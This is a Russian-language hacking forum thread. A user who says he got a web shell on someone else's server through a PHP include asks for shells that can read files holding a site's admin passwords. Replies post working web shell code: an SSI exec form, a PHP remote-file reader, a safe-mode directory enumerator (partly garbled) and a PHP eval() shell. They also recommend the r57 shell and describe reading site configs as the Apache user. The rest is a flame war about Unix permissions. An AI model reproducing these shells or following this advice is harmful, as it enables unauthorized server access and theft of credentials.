Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а
Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!

CODE
<html>
<body>
<script language="JavаScript">
<!--
function execute() {
var cmd = document.exec.cmd.value;
document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
}
//-->
</script>
<form name="exec">
<input type="text" name="cmd" size="20" value="">&nbsp;
<input type="submit" value="exec" onClick="execute()">
</form>
</body>
</html>

Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>

Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>
Спасибо! Приму к сведению! А есть ещё что-нибудь навороченное, с алиасами и всё-такое?

Есть , но стоит денег! Поставь хоть +! :)

Потыкай вот это еще

<?
"; echo ""; echo "
Root directory:
"; echo ""; echo "
------------------------------------
"; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i ";
foreach($D as $item) echo "{$item}\n";
echo "
"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>

Есть , но стоит денег! Поставь хоть +! :)
Потыкай вот это еще

Дай бог тебе здоровья, парень!

Поставь хоть +! :)

Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень! ;)

<?php
$gpc=get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
$c = $gpc?stripslashes($_POST['c']):$_POST['c'];
} else {
$c = NULL;
}
?>
<form action="" method="POST">
<textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea>
<br />
<input type="submit"/>
</form>
<?php
if (!is_null($c)) eval($c);
?>

=========
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться.
===========
Вот код для просмотра текущей директории:

$d = dir(".");
echo "Дескриптор: ".$d->handle."<br>\n";
echo "Путь: ".$d->path."<br>\n";
while (false !== ($entry = $d->read())) {
echo $entry."<br>\n";
}
$d->close();

=============
А вот для файла:

echo '<xmp>';
htmlspecialchars(readfile('file.php'));
echo '</xmp>';

-------------------------------------
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
=================
Есть еще шелл, не использующий system:
http://php.spb.ru/remview/

В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.

Береги себя!!! Стучи 1-869-53два!

<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>

а тогда накой штмлспециалчарс???

Да. Ты прав. Здесь можно обойтись одним лишь htmlspecialchars. Это лишнюю работу я сделал, написав <xmp>, </xmp>.

затем права(если nobody)
И как права поднимаешь? Извини, если вопрос не умный.

Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!

Или права httpd или apache и www!!!!

А. Твой скрипт стопудово будет с правами, от которых работает Apache.
Которые могут быть nobody. Или может быть создан специальный юзверь www.

да это не от скрипта зависит пойми! А от настроек сервера!

SkyMan (member.php?u=30168)
fly (member.php?u=35509)
Пишите полный бред.

Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!

Ты хотя бы понимаешь почему так происходит...
Все зависит от группы.
Как правило ты не пожешь просматривать
/home/user/
а вот
/home/user/public_html/
Можешь потаму что демон апача обзятельно будет смотреть поэтому ты и сможешь ее просматреть. А те юзеры котрым был создан отдельный uid те просто поставяь на эту папку свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.

Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.

С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!

>> свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
Тут не спорю, но часто все нормально проходит.

cash я имел в виду то, что если свой скрипт сделаешь, например, через sql-иньекцию с помощью "into outfile", то он будет работать под учетной записью, под которой работает Apache (а это прописано в httpd.conf).

Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.

С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!

Бредовее этого редко что увидишь...

fly, ты вобще в принципе понимаешь, что значит права в *nix'ах? Почитай получше, что такое права владельца (пользователя), что такое права группы, что такое права других (other). Это тебе сплоиты получается не нужны, так как ты /etc/shadow или /etc/master.passwd можешь прочитать расшифровать и пользовать рута, а уж kmem под фряху сделали специально для того чтобы тебе все усложнить... да и за чем собственно рут? у тебя и с nobody все отлично получться будет... и вобще вот они дураки (разработчики unix) какието там права придумали, зачем то суетились... не знали тогда недальновидные, что некий fly родится и всю их задумку на корню похерет... :D

ЗЫ короче RTFM!

Бредовее этого редко что увидишь...

fly, ты вобще в принципе понимаешь, что значит права в *nix'ах? Почитай получше, что такое права владельца (пользователя), что такое права группы, что такое права других (other). Это тебе сплоиты получается не нужны, так как ты /etc/shadow или /etc/master.passwd можешь прочитать расшифровать и пользовать рута, а уж kmem под фряху сделали специально для того чтобы тебе все усложнить... да и за чем собственно рут? у тебя и с nobody все отлично получться будет... и вобще вот они дураки (разработчики unix) какието там права придумали, зачем то суетились... не знали тогда недальновидные, что некий fly родится и всю их задумку на корню похерет... :D

ЗЫ короче RTFM!

дА НЕТ Я ЗНАЮ, /etc/shadow или /etc/master.passwd ЧТО ЭТО НЕ ПРОЧИТАТЬ, НО МОЖНО ЖЕ ПРОЧИТАТЬ ВСЕ КОНФИГИ К САЙТАМ И Т.П.!!!!! Я про права все знаю!

Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!
Хуясе вы тут ребята разошлись, такое только на виндовом серве не администрируемом можно встретить.

Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. ! Кста он меня понял, а вот тебя врядли. Не лечи доктор.

Ну как же тебя не понять блин, один (тот который плохо понимает) хреновину спросил, но его простить можно, так ему ответили(тот который "Практика большая, хоть и не Гуру!" ) таким бредом, вообще ппц.Гуру бля.

вот cash нормально пояснил, покрайней мере правильно.

Слышь fly, а если openbase_dir стоит то чё один хрен всё посмотришь без сплоитов, да ?
Гуру бля...

дА НЕТ Я ЗНАЮ, /etc/shadow или /etc/master.passwd ЧТО ЭТО НЕ ПРОЧИТАТЬ, НО МОЖНО ЖЕ ПРОЧИТАТЬ ВСЕ КОНФИГИ К САЙТАМ И Т.П.!!!!! Я про права все знаю!

все равно круто... поверь мне, fly aka neo, это не у всех удается... видать ты избранный...

лано, хорош флеймить... fly не вводи людей(не знающих, таких же как ты) в заблуждения...

Еще раз:

RTFM!

Вопрос давно решен,флейм я не развожу! Я помог человеку вот и все!